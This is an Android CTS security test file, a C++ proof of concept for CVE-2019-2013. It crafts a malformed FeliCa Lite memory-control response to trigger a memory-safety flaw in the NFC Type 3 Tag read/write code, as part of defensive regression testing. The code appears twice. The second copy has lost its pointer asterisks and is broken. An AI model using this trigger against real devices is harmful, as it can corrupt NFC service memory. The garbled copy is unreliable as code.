hostsidetests/securitybulletin/securityPatch/CVE-2019-2013/poc.cpp - platform/cts - Git at Google

 /*
  * Copyright (C) 2021 The Android Open Source Project
  *
  * Licensed under the Apache License, Version 2.0 (the "License");
  * you may not use this file except in compliance with the License.
  * You may obtain a copy of the License at
  *
  *      http://www.apache.org/licenses/LICENSE-2.0
  *
  * Unless required by applicable law or agreed to in writing, software
  * distributed under the License is distributed on an "AS IS" BASIS,
  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  * See the License for the specific language governing permissions and
  * limitations under the License.
  */

 #include <nfc_int.h>
 #include <rw_int.h>
 #include <dlfcn.h>

 #include "../includes/common.h"
 #include "../includes/memutils.h"

 #define T3T_MSG_FELICALITE_MC_OFFSET 0x01

 char enable_selective_overload = ENABLE_NONE;

 extern tRW_CB rw_cb;
 extern tNFC_CB nfc_cb;
 void rw_init(void);
 tNFC_STATUS rw_t3t_select(uint8_t peer_nfcid2[NCI_RF_F_UID_LEN],
                           uint8_t mrti_check, uint8_t mrti_update);

 static void (*real_GKI_freebuf)(void* ptr) = nullptr;
 void *kAllocatedPointers[2];
 int allocatedPointersIndex = -1;
 bool kIsInitialized = false;

 void init(void) {
     real_GKI_freebuf = (void (*)(void*))dlsym(RTLD_NEXT, "_Z11GKI_freebufPv");
     if (!real_GKI_freebuf) {
         return;
     }

     kIsInitialized = true;
 }

 void GKI_freebuf(void* ptr) {
     if (!kIsInitialized) {
         init();
     }
     if (ptr == kAllocatedPointers[0] || ptr == kAllocatedPointers[1]) {
         return;
     } else {
         real_GKI_freebuf(ptr);
     }
 }

 void *allocate_memory(size_t size) {
     void *ptr = malloc(size);
     memset(ptr, 0x0, size);
     kAllocatedPointers[++allocatedPointersIndex] = ptr;
     return ptr;
 }

 // borrowed from rw_i93.cc
 enum {
     RW_T3T_CMD_DETECT_NDEF,
     RW_T3T_CMD_CHECK_NDEF,
     RW_T3T_CMD_UPDATE_NDEF,
     RW_T3T_CMD_CHECK,
     RW_T3T_CMD_UPDATE,
     RW_T3T_CMD_SEND_RAW_FRAME,
     RW_T3T_CMD_GET_SYSTEM_CODES,
     RW_T3T_CMD_FORMAT,
     RW_T3T_CMD_SET_READ_ONLY_SOFT,
     RW_T3T_CMD_SET_READ_ONLY_HARD,

     RW_T3T_CMD_MAX
 };

 // borrowed from rw_i93.cc
 enum {
     RW_T3T_STATE_NOT_ACTIVATED,
     RW_T3T_STATE_IDLE,
     RW_T3T_STATE_COMMAND_PENDING
 };

 // borrowed from rw_i93.cc
 enum {
     /* Sub states for formatting Felica-Lite */
     RW_T3T_FMT_SST_POLL_FELICA_LITE, /* Waiting for POLL Felica-Lite response (for
      formatting) */
     RW_T3T_FMT_SST_CHECK_MC_BLK, /* Waiting for Felica-Lite MC (MemoryControl)
      block-read to complete */
     RW_T3T_FMT_SST_UPDATE_MC_BLK, /* Waiting for Felica-Lite MC (MemoryControl)
      block-write to complete */
     RW_T3T_FMT_SST_UPDATE_NDEF_ATTRIB, /* Waiting for NDEF attribute block-write
      to complete */

     /* Sub states for setting Felica-Lite read only */
     RW_T3T_SRO_SST_POLL_FELICA_LITE, /* Waiting for POLL Felica-Lite response (for
      setting read only) */
     RW_T3T_SRO_SST_UPDATE_NDEF_ATTRIB, /* Waiting for NDEF attribute block-write
      to complete */
     RW_T3T_SRO_SST_CHECK_MC_BLK, /* Waiting for Felica-Lite MC (MemoryControl)
      block-read to complete */
     RW_T3T_SRO_SST_UPDATE_MC_BLK /* Waiting for Felica-Lite MC (MemoryControl)
      block-write to complete */
 };

 void cback(uint8_t c __attribute__((unused)),
            tRW_DATA* d __attribute__((unused))) {
 }

 int main() {

     enable_selective_overload = ENABLE_ALL;
     tRW_T3T_CB* p_t3t = &rw_cb.tcb.t3t;

     GKI_init();
     rw_init();

     uint8_t peer_nfcid2[NCI_RF_F_UID_LEN];
     uint8_t mrti_check = 1, mrti_update = 1;
     if (rw_t3t_select(peer_nfcid2, mrti_check, mrti_update) != NFC_STATUS_OK) {
         return EXIT_FAILURE;
     }

     tNFC_CONN *p_data = (tNFC_CONN *) allocate_memory(sizeof(tNFC_CONN));
     if (!p_data) {
         return EXIT_FAILURE;
     }
     p_data->data.p_data = (NFC_HDR *) allocate_memory(sizeof(NFC_HDR) * 4);
     if (!(p_data->data.p_data)) {
         free(p_data);
         return EXIT_FAILURE;
     }
     p_data->status = NFC_STATUS_OK;

     p_t3t->cur_cmd = RW_T3T_CMD_SET_READ_ONLY_HARD;
     p_t3t->rw_state = RW_T3T_STATE_COMMAND_PENDING;
     p_t3t->rw_substate = RW_T3T_SRO_SST_CHECK_MC_BLK;

     NFC_HDR* p_msg = (p_data->data).p_data;
     p_msg->len = T3T_MSG_RSP_COMMON_HDR_LEN;

     uint8_t* p_t3t_rsp = (uint8_t*) (p_msg + 1) + (p_msg->offset + 1);
     p_t3t_rsp[T3T_MSG_RSP_OFFSET_RSPCODE] = T3T_MSG_OPC_CHECK_RSP;
     p_t3t_rsp[T3T_MSG_RSP_OFFSET_STATUS1] = T3T_MSG_RSP_STATUS_OK;

     uint8_t* p_mc = &p_t3t_rsp[T3T_MSG_RSP_OFFSET_CHECK_DATA];
     p_mc[T3T_MSG_FELICALITE_MC_OFFSET_SYS_OP] = T3T_MSG_FELICALITE_MC_OFFSET;

     tNFC_CONN_CB* p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID];
     tNFC_CONN_EVT event = NFC_DATA_CEVT;
     TIMER_LIST_ENT pFirst = { };
     nfc_cb.quick_timer_queue.p_first = &pFirst;

     rw_cb.p_cback = &cback;
     p_cb->p_cback(0, event, p_data);

     free(p_data->data.p_data);
     free(p_data);

     enable_selective_overload = ENABLE_NONE;
     return EXIT_SUCCESS;
 }
	/*
	* Copyright (C) 2021 The Android Open Source Project
	*
	* Licensed under the Apache License, Version 2.0 (the "License");
	* you may not use this file except in compliance with the License.
	* You may obtain a copy of the License at
	*
	* http://www.apache.org/licenses/LICENSE-2.0
	*
	* Unless required by applicable law or agreed to in writing, software
	* distributed under the License is distributed on an "AS IS" BASIS,
	* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
	* See the License for the specific language governing permissions and
	* limitations under the License.
	*/

	#include <nfc_int.h>
	#include <rw_int.h>
	#include <dlfcn.h>

	#include "../includes/common.h"
	#include "../includes/memutils.h"

	#define T3T_MSG_FELICALITE_MC_OFFSET 0x01

	char enable_selective_overload = ENABLE_NONE;

	extern tRW_CB rw_cb;
	extern tNFC_CB nfc_cb;
	void rw_init(void);
	tNFC_STATUS rw_t3t_select(uint8_t peer_nfcid2[NCI_RF_F_UID_LEN],
	uint8_t mrti_check, uint8_t mrti_update);

	static void (real_GKI_freebuf)(void ptr) = nullptr;
	void *kAllocatedPointers[2];
	int allocatedPointersIndex = -1;
	bool kIsInitialized = false;

	void init(void) {
	real_GKI_freebuf = (void ()(void))dlsym(RTLD_NEXT, "_Z11GKI_freebufPv");
	if (!real_GKI_freebuf) {
	return;
	}

	kIsInitialized = true;
	}

	void GKI_freebuf(void* ptr) {
	if (!kIsInitialized) {
	init();
	}
	if (ptr == kAllocatedPointers[0] \|\| ptr == kAllocatedPointers[1]) {
	return;
	} else {
	real_GKI_freebuf(ptr);
	}
	}

	void *allocate_memory(size_t size) {
	void *ptr = malloc(size);
	memset(ptr, 0x0, size);
	kAllocatedPointers[++allocatedPointersIndex] = ptr;
	return ptr;
	}

	// borrowed from rw_i93.cc
	enum {
	RW_T3T_CMD_DETECT_NDEF,
	RW_T3T_CMD_CHECK_NDEF,
	RW_T3T_CMD_UPDATE_NDEF,
	RW_T3T_CMD_CHECK,
	RW_T3T_CMD_UPDATE,
	RW_T3T_CMD_SEND_RAW_FRAME,
	RW_T3T_CMD_GET_SYSTEM_CODES,
	RW_T3T_CMD_FORMAT,
	RW_T3T_CMD_SET_READ_ONLY_SOFT,
	RW_T3T_CMD_SET_READ_ONLY_HARD,

	RW_T3T_CMD_MAX
	};

	// borrowed from rw_i93.cc
	enum {
	RW_T3T_STATE_NOT_ACTIVATED,
	RW_T3T_STATE_IDLE,
	RW_T3T_STATE_COMMAND_PENDING
	};

	// borrowed from rw_i93.cc
	enum {
	/* Sub states for formatting Felica-Lite */
	RW_T3T_FMT_SST_POLL_FELICA_LITE, /* Waiting for POLL Felica-Lite response (for
	formatting) */
	RW_T3T_FMT_SST_CHECK_MC_BLK, /* Waiting for Felica-Lite MC (MemoryControl)
	block-read to complete */
	RW_T3T_FMT_SST_UPDATE_MC_BLK, /* Waiting for Felica-Lite MC (MemoryControl)
	block-write to complete */
	RW_T3T_FMT_SST_UPDATE_NDEF_ATTRIB, /* Waiting for NDEF attribute block-write
	to complete */

	/* Sub states for setting Felica-Lite read only */
	RW_T3T_SRO_SST_POLL_FELICA_LITE, /* Waiting for POLL Felica-Lite response (for
	setting read only) */
	RW_T3T_SRO_SST_UPDATE_NDEF_ATTRIB, /* Waiting for NDEF attribute block-write
	to complete */
	RW_T3T_SRO_SST_CHECK_MC_BLK, /* Waiting for Felica-Lite MC (MemoryControl)
	block-read to complete */
	RW_T3T_SRO_SST_UPDATE_MC_BLK /* Waiting for Felica-Lite MC (MemoryControl)
	block-write to complete */
	};

	void cback(uint8_t c __attribute__((unused)),
	tRW_DATA* d __attribute__((unused))) {
	}

	int main() {

	enable_selective_overload = ENABLE_ALL;
	tRW_T3T_CB* p_t3t = &rw_cb.tcb.t3t;

	GKI_init();
	rw_init();

	uint8_t peer_nfcid2[NCI_RF_F_UID_LEN];
	uint8_t mrti_check = 1, mrti_update = 1;
	if (rw_t3t_select(peer_nfcid2, mrti_check, mrti_update) != NFC_STATUS_OK) {
	return EXIT_FAILURE;
	}

	tNFC_CONN p_data = (tNFC_CONN ) allocate_memory(sizeof(tNFC_CONN));
	if (!p_data) {
	return EXIT_FAILURE;
	}
	p_data->data.p_data = (NFC_HDR ) allocate_memory(sizeof(NFC_HDR) 4);
	if (!(p_data->data.p_data)) {
	free(p_data);
	return EXIT_FAILURE;
	}
	p_data->status = NFC_STATUS_OK;

	p_t3t->cur_cmd = RW_T3T_CMD_SET_READ_ONLY_HARD;
	p_t3t->rw_state = RW_T3T_STATE_COMMAND_PENDING;
	p_t3t->rw_substate = RW_T3T_SRO_SST_CHECK_MC_BLK;

	NFC_HDR* p_msg = (p_data->data).p_data;
	p_msg->len = T3T_MSG_RSP_COMMON_HDR_LEN;

	uint8_t* p_t3t_rsp = (uint8_t*) (p_msg + 1) + (p_msg->offset + 1);
	p_t3t_rsp[T3T_MSG_RSP_OFFSET_RSPCODE] = T3T_MSG_OPC_CHECK_RSP;
	p_t3t_rsp[T3T_MSG_RSP_OFFSET_STATUS1] = T3T_MSG_RSP_STATUS_OK;

	uint8_t* p_mc = &p_t3t_rsp[T3T_MSG_RSP_OFFSET_CHECK_DATA];
	p_mc[T3T_MSG_FELICALITE_MC_OFFSET_SYS_OP] = T3T_MSG_FELICALITE_MC_OFFSET;

	tNFC_CONN_CB* p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID];
	tNFC_CONN_EVT event = NFC_DATA_CEVT;
	TIMER_LIST_ENT pFirst = { };
	nfc_cb.quick_timer_queue.p_first = &pFirst;

	rw_cb.p_cback = &cback;
	p_cb->p_cback(0, event, p_data);

	free(p_data->data.p_data);
	free(p_data);

	enable_selective_overload = ENABLE_NONE;
	return EXIT_SUCCESS;
	}